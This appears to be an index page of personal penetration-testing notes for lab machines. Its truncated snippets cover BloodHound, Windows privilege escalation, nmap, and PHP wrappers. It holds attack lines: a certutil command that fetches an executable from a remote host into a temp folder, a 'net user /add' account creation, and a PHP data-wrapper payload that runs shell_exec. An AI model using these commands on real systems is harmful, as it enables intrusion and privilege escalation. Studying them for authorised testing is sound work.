Shuciran Pentesting Notes

Bloodhound

Sharphound.exe First upload Sharphound to the system and then run the following commands from a folder where you can write as it will download a .zip file: # For SharpHound.ps1 (each line is a comm...

NTP Synchronization

#Note It is possible that sometimes you need to use the host domain (e.g. sizzle.htb) NTPDATE ntpdate 10.10.11.102 RDATE rdate -n 10.10.11.102 DATE It is also possible to set the date “manually” ...

Windows User Creation/Group Addition

User create If we are able to create a user it is as simple as using the net.exe windows utility: net user shuciran shucir4n /add Add user to a group If there is a group in the domain with some pr...

Unquoted Service Path

Another interesting attack vector that can lead to privilege escalation on Windows operating systems revolves around unquoted service paths. We can use this attack when we have write permissions to...

UAC Integrity Level Upgrade

Even while logged in as an administrative user, the account will have two security tokens, one running at a medium integrity level and the other at high integrity level. UAC acts as the separation ...

Certutil.exe

certutil.exe -urlcache -f http://10.0.0.5/40564.exe C:\Windows\Temp\bad.exe Example: [[Forest#^8fde0e]] # Dump general information certutil -dump # Dump information about certificate authority ce...

System (Windows)

System information systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" systeminfo | findstr /C:"sistema" #Español Installed updates wmic qfe get Caption, Description Installed ...

NMAP

Scan Network Range Shuciran@htb[/htb]$ sudo nmap 10.129.2.0/24 -sn -oA tnet | grep for | cut -d" " -f5 10.129.2.4 10.129.2.10 10.129.2.11 10.129.2.18 10.129.2.19 10.129.2.20 10.129.2.28 Nmap Styl...

Common Ports

Port Type Usage 20 TCP FTP Data 21 TCP FTP Control 22 TCP/UDP Secure Shell (SSH)...

PHP Wrappers

Wrappers data Represent a string on the web page http://10.11.0.22/menu.php?file=data:text/plain,hello world Shell with data http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_ex...